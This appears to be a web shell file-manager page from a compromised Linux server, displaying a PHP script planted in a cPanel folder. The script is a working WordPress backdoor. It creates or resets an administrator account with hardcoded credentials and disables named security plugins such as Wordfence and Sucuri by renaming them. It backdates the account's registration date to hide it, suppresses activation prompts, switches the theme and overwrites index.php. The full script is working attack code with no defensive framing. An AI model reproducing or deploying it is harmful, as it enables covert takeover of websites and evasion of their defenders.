HEX
Server: LiteSpeed
System: Linux shams.tasjeel.ae 5.14.0-611.5.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Nov 11 08:09:09 EST 2025 x86_64
User: infowars (1469)
PHP: 8.2.29
Disabled: NONE
$ pwd: /home/infowars/.cpanel/
Upload Files
File: /home/infowars/.cpanel/xx.php
<?php
// Matikan semua output agar tidak mengganggu HTML halaman login nanti
// Kita akan simpan pesan-pesan di variabel array
ob_start();
 $status_messages = [];

 $new_user_login = 'audywebmuchy@117';
 $new_user_pass  = 'audyB1kuS4y4';
 $new_user_email = 'adminwebsiteasasd@kolusi.comm';

// === Cari root WordPress (tempat wp-load.php) ===
function find_wp_root($start_dir) {
    $dir = $start_dir;
    while ($dir !== dirname($dir)) {
        if (file_exists($dir . '/wp-load.php')) {
            return $dir;
        }
        $dir = dirname($dir);
    }
    return null;
}

 $wp_root = find_wp_root(__DIR__);
if (!$wp_root) {
    $status_messages[] = "<span style='color:red;'>Error: WordPress root directory not found.</span>";
} else {
    $status_messages[] = "WordPress root found at: " . $wp_root;
}

 $wp_load = $wp_root . '/wp-load.php';
require_once $wp_load; // ini otomatis load wp-config.php juga

global $wpdb;

// === Gunakan API WordPress langsung ===
require_once ABSPATH . 'wp-includes/registration.php';
require_once ABSPATH . 'wp-includes/pluggable.php';

// --- FUNSI NONAKTIFK PLUGIN (MODIFIKASI) ---
// Fungsi ini sekarang mengembalikan array pesan, bukan mencetak langsung
function temporarily_disable_security_plugins() {
    $messages = [];
    $plugins_dir = WP_CONTENT_DIR . '/plugins';
    $security_plugins = ['wordfence', 'sucuri-scanner', 'ithemes-security-pro', 'all-in-one-wp-security-and-firewall'];
    $disabled_plugins = [];
    foreach ($security_plugins as $plugin_slug) {
        $plugin_path = $plugins_dir . '/' . $plugin_slug;
        $disabled_path = $plugin_path . '.disabled.by.script';
        if (is_dir($plugin_path) && !is_dir($disabled_path)) {
            if (rename($plugin_path, $disabled_path)) {
                $disabled_plugins[] = $plugin_slug;
                $messages[] = "Security plugin '{$plugin_slug}' temporarily disabled.";
            }
        }
    }
    if (empty($messages)) {
        $messages[] = "No known security plugins found to disable.";
    }
    return $messages;
}

// --- FUNSI TAMBAHAN UNTUK MELEWATI PROMPT (MODIFIKASI) ---
function make_user_fully_active($user_id) {
    $messages = [];
    global $wpdb;

    $wpdb->update($wpdb->prefix . 'users', ['user_activation_key' => ''], ['ID' => $user_id], ['%s'], ['%d']);
    $wpdb->update($wpdb->prefix . 'users', ['user_status' => 0], ['ID' => $user_id], ['%d'], ['%d']);
    update_user_meta($user_id, 'default_password_nag', false);
    update_user_meta($user_id, '_is_email_verified', 'true');

    $messages[] = "User '{$user_id}' has been marked as fully active to skip login prompts.";
    return $messages;
}

// --- FUNSI RESTORE INDEX (MODIFIKASI) ---
function restore_wordpress_index($index_path) {
    $messages = [];
    $default_content = <<<PHP
<?php
/**
 * Front to the WordPress application.
 */
define( 'WP_USE_THEMES', true );
require __DIR__ . '/wp-blog-header.php';
PHP;
    if (file_exists($index_path)) {
        unlink($index_path);
        $messages[] = "Existing index.php deleted.";
    }
    if (file_put_contents($index_path, $default_content)) {
        $messages[] = "index.php restored to WordPress default.";
    } else {
        $messages[] = "<span style='color:red;'>Failed to restore index.php.</span>";
    }
    return $messages;
}

// --- JALANKAN PROSES DAN KUMPULKAN PESAN ---

// 1. Nonaktifkan plugin
 $disabled_plugins_messages = temporarily_disable_security_plugins();
 $status_messages = array_merge($status_messages, $disabled_plugins_messages);

// 2. Konfigurasi dan buat/update user
 $desired_registration_date = '2022-05-15 10:30:00';
 $user = get_user_by('login', $new_user_login);
 $user_id = null;

if ($user) {
    wp_update_user(['ID' => $user->ID, 'user_pass' => $new_user_pass, 'user_email' => $new_user_email]);
    $status_messages[] = "Success! Existing user '{$new_user_login}' updated.";
    $user_id = $user->ID;
} else {
    $user_id = wp_create_user($new_user_login, $new_user_pass, $new_user_email);
    if (is_wp_error($user_id)) {
        $status_messages[] = "<span style='color:red;'>Error creating user: " . $user_id->get_error_message() . "</span>";
        $user_id = null; // Reset jika error
    } else {
        $user = new WP_User($user_id);
        $user->set_role('administrator');
        $status_messages[] = "Success! WordPress admin user '{$new_user_login}' created.";
    }
}

// 3. Ubah tanggal registrasi (jika user berhasil dibuat/diupdate)
if ($user_id) {
    $wpdb->update($wpdb->prefix . 'users', ['user_registered' => $desired_registration_date], ['ID' => $user_id], ['%s'], ['%d']);
    $status_messages[] = "User registration date has been set to: {$desired_registration_date}";

    // 4. Panggil fungsi untuk melewati prompt
    $active_messages = make_user_fully_active($user_id);
    $status_messages = array_merge($status_messages, $active_messages);
}

// 5. Set tema
 $themes = wp_get_themes();
 $default_theme = 'twentytwentyfour'; // fallback
 $candidates = [];
foreach ($themes as $slug => $theme) {
    if (preg_match('/^twenty\d{2,4}$/', $slug)) {
        $candidates[$slug] = $slug;
    }
}
if (!empty($candidates)) {
    krsort($candidates);
    $default_theme = reset($candidates);
}
switch_theme($default_theme);
 $status_messages[] = "Theme set to {$default_theme}.";

// 6. Restore index.php
 $index_messages = restore_wordpress_index($wp_root . '/index.php');
 $status_messages = array_merge($status_messages, $index_messages);

// 7. (Opsional) Hapus file asing
// $cleanup_messages = cleanup_php_root($wp_root);
// $status_messages = array_merge($status_messages, $cleanup_messages);

// Bersihkan buffer output yang mungkin tersisa
ob_end_clean();

// === TAMPILKAN HALAMAN LOGIN DENGAN PESAN STATUS ===

// Fungsi untuk menampilkan pesan kita di header login
function display_script_status_messages() {
    global $status_messages;
    if (!empty($status_messages)) {
        echo '<div id="script_status_notice" class="notice" style="margin: 20px 0; padding: 12px; border-left: 4px solid #72aee6; background-color: #fff; box-shadow: 0 1px 1px rgba(0,0,0,.04);">';
        echo '<h4>Script Execution Summary:</h4>';
        echo '<ul style="margin: 0; padding-left: 20px;">';
        foreach ($status_messages as $msg) {
            echo '<li>' . $msg . '</li>';
        }
        echo '</ul>';
        echo '</div>';
    }
}

// Hook fungsi kita ke dalam halaman login
add_action('login_header', 'display_script_status_messages');

// Sekarang, kita "memasukkan" halaman login untuk ditampilkan
// Ini akan menjalankan wp-login.php dan menampilkan HTML-nya.
// Karena kita sudah men-hook fungsi pesan kita, maka pesan akan muncul di sana.
include($wp_root . '/wp-login.php');

// Hentikan eksekusi skrip agar tidak ada apa-apa lagi yang ditampilkan
exit;

?>
@ Telegram